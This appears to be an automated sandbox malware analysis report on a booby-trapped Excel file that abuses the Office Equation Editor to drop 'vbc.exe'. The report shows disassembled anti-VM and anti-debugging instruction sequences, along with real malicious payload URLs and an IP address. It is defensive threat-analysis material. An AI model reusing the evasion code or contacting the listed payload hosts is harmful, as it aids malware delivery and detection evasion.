Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Stream path 'EncryptedPackage' entropy: 7.99876914636 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E28A0 6_2_002E28A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D3E 6_2_002E7D3E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7503 6_2_002E7503
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2379 6_2_002E2379
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E27A4 6_2_002E27A4
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E750B second address: 00000000002E752A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4E5E24E1h 0x00000007 xor eax, 256A0EB4h 0x0000000c xor eax, 6B41C15Ch 0x00000011 xor eax, 0075EB08h 0x00000016 cpuid 0x00000018 popad 0x00000019 pushad 0x0000001a mov ecx, 000000F8h 0x0000001f rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E542E rdtsc 6_2_002E542E
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824 Thread sleep time: -300000s >= -30000s Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E542E rdtsc 6_2_002E542E
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E504C mov eax, dword ptr fs:[00000030h] 6_2_002E504C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D3E mov eax, dword ptr fs:[00000030h] 6_2_002E7D3E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7106 mov eax, dword ptr fs:[00000030h] 6_2_002E7106
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D06 mov eax, dword ptr fs:[00000030h] 6_2_002E7D06
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E322C mov eax, dword ptr fs:[00000030h] 6_2_002E322C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3259 mov eax, dword ptr fs:[00000030h] 6_2_002E3259
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2EF7 mov eax, dword ptr fs:[00000030h] 6_2_002E2EF7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6B69 mov eax, dword ptr fs:[00000030h] 6_2_002E6B69
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E27A4 mov eax, dword ptr fs:[00000030h] 6_2_002E27A4

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7337 cpuid 6_2_002E7337
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 452495 Sample: MILKA CHOCO COW BISCUITS AN... Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 Multi AV Scanner detection for dropped file 2->26 28 9 other signatures 2->28 6 EQNEDT32.EXE 12 2->6         started        11 EXCEL.EXE 34 30 2->11         started        process3 dnsIp4 20 180.214.239.39, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 6->20 16 C:\Users\user\AppData\...\.svchost[1].exe, PE32 6->16 dropped 18 C:\Users\Public\vbc.exe, PE32 6->18 dropped 30 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->30 13 vbc.exe 1 6->13         started        file5 signatures6 process7 signatures8 32 Multi AV Scanner detection for dropped file 13->32 34 Contains functionality to detect hardware virtualization (CPUID execution measurement) 13->34 36 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 13->36 38 Tries to detect virtualization through RDTSC time measurements 13->38
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
180.214.239.39
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin true
  • Avira URL Cloud: safe
 unknown
http://180.214.239.39/process/.svchost.exe true
  • Avira URL Cloud: malware
 unknown